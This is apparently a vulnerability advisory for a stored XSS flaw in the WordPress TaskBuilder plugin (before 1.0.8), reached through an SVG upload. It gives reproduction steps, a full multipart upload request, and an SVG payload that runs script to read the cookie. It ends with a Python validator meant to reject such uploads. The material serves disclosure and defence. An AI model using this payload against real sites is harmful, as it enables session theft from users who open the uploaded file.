Wordpress Plugin TaskBuilder < 1.0.8 — Subscriber + Stored XSS via SVG file upload

Rizacan Tufan
2 min read, Oct 3, 2023


Description

TaskBuilder is a plugin for managing all your projects and tasks and getting things done effectively.

The plugin's file upload area accepts SVG files. The script embedded in an uploaded SVG executes when the URL of the stored file is opened in a browser.

An attacker can attach the file to a comment and lure other users into clicking the link to the uploaded file.

While the upload field itself requires an authenticated user, no authentication is required to retrieve the uploaded file by its URL.

The details of the discovery are given below.

Proof of Concept (PoC)

The details of the stored XSS found in the application are given below.

Steps To Reproduce :

  1. Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
  2. Choose any task.
  3. Focus on “Write a comment”.
  4. Click on “Attach Files”.
  5. Intercept the upload request with a proxy and modify the “file” parameter.
  6. Replace the content of the “file” parameter with the XSS-SVG payload.
  7. Click on “Comment”.
  8. View the uploaded image and open its URL. (Sample: http://vuln.local/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU)

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln.local
Cookie: ...
...
Referer: http://vuln.local/wp-admin/admin.php?page=wppm-tasks
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212199795625489804601222718372
Content-Length: 975
Origin: http://vuln.local
Connection: close

-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="file"; filename="captcha.svg"
Content-Type: text/plain
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="arr_name"
captcha.php
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="action"
wppm_upload_file
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="nonce"
b1f6248d72
-----------------------------212199795625489804601222718372--

Payload :

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

Parameter(s) : file
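A server-side validation a defender could put in front of this upload path, as an added example in Python (not TaskBuilder's own code). It parses the uploaded SVG and rejects script elements, event-handler attributes and active href schemes, and also flags the request-level mismatches visible in the PoC above; the filename and declared Content-Type are assumed to be available to the upload handler, and the sample SVGs are constructed from the advisory's payload.

```python
"""Server-side check for SVG uploads: flags content that executes when the
file is opened directly at its URL. Added example, not TaskBuilder's code."""
import re
import xml.etree.ElementTree as ET
# Elements that run script or embed active content in a top-level SVG document.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)

def _local(name: str) -> str:
    # Strip the {namespace} prefix ElementTree puts on tags and attributes.
    return name.rsplit("}", 1)[-1]

def svg_findings(data: bytes) -> list[str]:
    """Return reasons the SVG is unsafe; an empty list means no finding."""
    findings = []
    if b"<!ENTITY" in data:                      # no entity tricks via the internal DTD subset
        findings.append("DTD entity declaration")
    try:
        root = ET.fromstring(data)               # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element <{_local(root.tag)}> is not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.lower().startswith("on"):       # onload, onclick, ...
                findings.append(f"event handler {a} on <{tag}>")
            elif a == "href" and ACTIVE_SCHEME.match(value):
                findings.append(f"active href on <{tag}>")
    return findings

def check_upload(filename: str, declared_type: str, data: bytes) -> list[str]:
    """Content check plus the request-level mismatches seen in the advisory's PoC."""
    findings = []
    if not filename.lower().endswith(".svg"):
        findings.append("extension is not .svg")
    if declared_type.lower() != "image/svg+xml":
        findings.append(f"declared Content-Type {declared_type!r} is not image/svg+xml")
    return findings + svg_findings(data)

# Constructed samples: the advisory's payload, and a harmless SVG for comparison.
MALICIOUS_SVG = (b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
                 b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
                 b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/>'
                 b'<script type="text/javascript">alert(document.cookie);</script></svg>')
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
```

Calling check_upload("captcha.svg", "text/plain", MALICIOUS_SVG) returns both the Content-Type mismatch and the forbidden script element, so the request from the PoC would be rejected before the file is stored.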
